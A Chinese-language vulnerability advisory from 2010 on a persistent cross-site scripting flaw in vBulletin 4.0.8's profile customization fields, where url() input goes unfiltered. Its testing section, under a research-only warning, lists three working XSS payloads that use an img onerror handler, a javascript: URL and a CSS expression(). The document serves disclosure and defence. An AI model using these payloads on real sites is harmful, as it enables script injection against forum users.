发布日期：2010-11-14
更新日期：2010-11-16

受影响系统：

VBulletin VBulletin 4.0.8

描述：

---

BUGTRAQ  ID: 44873

vBulletin是一款开放源代码的PHP论坛程序。

vBulletin的Profile Customization功能中存在持续性跨站脚本漏洞。在配置文件的自定义字段，可以输入颜色代码、rgb代码和图形。由于url()函数没有正确的过滤用户输入，导致vBulletin受跨站脚本攻击的影响。

<*来源：MaXe
  
  链接：http://forum.intern0t.net/intern0t-advisories/3349-vbulletin-4-0-8-persistent-cross-site-scripting-via-profile-customization.html
        http://secunia.com/advisories/42209/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101, 114,78,48,84,11))" />)
url(/);background:url(javascript:document.write(1337))
url(/);width:expression(alert('www.intern0t.net'))

建议：

---

厂商补丁：

VBulletin
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.vbulletin.com/

浏览次数：3403
严重程度：0（网友投票）